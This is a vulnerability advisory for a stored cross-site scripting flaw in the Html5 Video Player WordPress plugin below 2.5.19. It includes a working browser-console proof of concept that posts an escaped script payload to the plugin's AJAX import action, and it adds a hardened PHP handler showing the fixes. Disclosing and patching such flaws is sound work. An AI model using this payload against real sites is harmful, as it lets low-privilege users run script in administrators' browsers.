Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS

WPEX-ID: 759B3866-C619-42CC-94A8-0AF6D199CC81
Author: Krzysztof Zając (CERT PL)
Published: Dec 08, 2023

AI Score: 5.6 Medium (confidence: High)
EPSS: 0.0004 Low (percentile: 14.2%)

Description: The plugin does not sanitise and escape some of its player settings. Combined with missing capability checks around the plugin's AJAX actions, this allows any authenticated user, with privileges as low as subscriber, to perform Stored Cross-Site Scripting attacks against high-privilege users such as admins.

Run the command below in the web browser's developer console while logged in to the blog as a subscriber user (id=14 is the ID of an existing video player created by the plugin):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  // The content parameter is a JSON object whose h5vp_total_views value is
  // <script>alert(1);</script> written as \u escapes.
  "body": "action=h5vp_import_data&id=14&content={\"h5vp_total_views\":\"\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003b\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\"}",
  "method": "POST",
}).then((response) => { return response.text(); })
  .then((data) => { console.log(data); });

The XSS is triggered when an admin views the player list (i.e. https://example.com/wp-admin/edit.php?post_type=videoplayer).
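The advisory names three missing controls: a capability check on the AJAX action, sanitisation of the imported settings, and escaping when they are rendered in the admin list. The handler below is an added example, not code from the Html5 Video Player plugin or from the advisory author; it shows the standard WordPress pattern for all three. The action name example_import_player, the nonce name, the meta key _example_player_settings and the manage_options capability are assumptions chosen for illustration; the h5vp_total_views key and the videoplayer post type are the ones that appear in the proof of concept above.

```php
<?php
// Added example (hypothetical handler, not the plugin's code): an admin-ajax
// import action hardened with a capability check, a nonce check, allow-listed
// and type-coerced input, and escaped output.

add_action( 'wp_ajax_example_import_player', 'example_import_player' );

function example_import_player() {
    // Capability check: a subscriber fails here before any data is touched.
    // 'manage_options' is an assumed capability; use the narrowest one that fits.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Nonce check so the request cannot be forged from another origin.
    // 'example_import_player' is an assumed nonce action name.
    check_ajax_referer( 'example_import_player', 'nonce' );

    // The player ID must be an integer that refers to a real player post.
    $player_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( ! $player_id || 'videoplayer' !== get_post_type( $player_id ) ) {
        wp_send_json_error( 'invalid player id', 400 );
    }

    // Decode the JSON body. json_decode turns the \u-escaped form of a payload
    // back into literal characters, so validation must run on the decoded
    // values, never on the raw request string.
    $raw     = isset( $_POST['content'] ) ? wp_unslash( $_POST['content'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( 'malformed content', 400 );
    }

    // Allow-list the keys that are accepted and coerce each to its expected
    // type. A view counter is a number, so anything else (including markup)
    // collapses to 0 rather than being stored.
    $clean = array(
        'total_views' => isset( $decoded['h5vp_total_views'] ) ? absint( $decoded['h5vp_total_views'] ) : 0,
        'title'       => isset( $decoded['title'] ) ? sanitize_text_field( $decoded['title'] ) : '',
    );

    update_post_meta( $player_id, '_example_player_settings', $clean );
    wp_send_json_success( $clean );
}

// Output side: escape at render time regardless of what is stored, so a value
// that slipped past input handling still cannot execute in the admin's browser.
function example_render_player_columns( $player_id ) {
    $settings = get_post_meta( $player_id, '_example_player_settings', true );
    $views    = ( is_array( $settings ) && isset( $settings['total_views'] ) ) ? $settings['total_views'] : 0;
    $title    = ( is_array( $settings ) && isset( $settings['title'] ) ) ? $settings['title'] : '';

    echo '<td>' . esc_html( (string) $views ) . '</td>';
    echo '<td>' . esc_html( $title ) . '</td>';
}
```

The two functions are independent layers: the capability check stops low-privilege users from reaching the import at all, input coercion keeps script text out of the database, and esc_html() on output protects the admin view even if an older record already contains markup.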
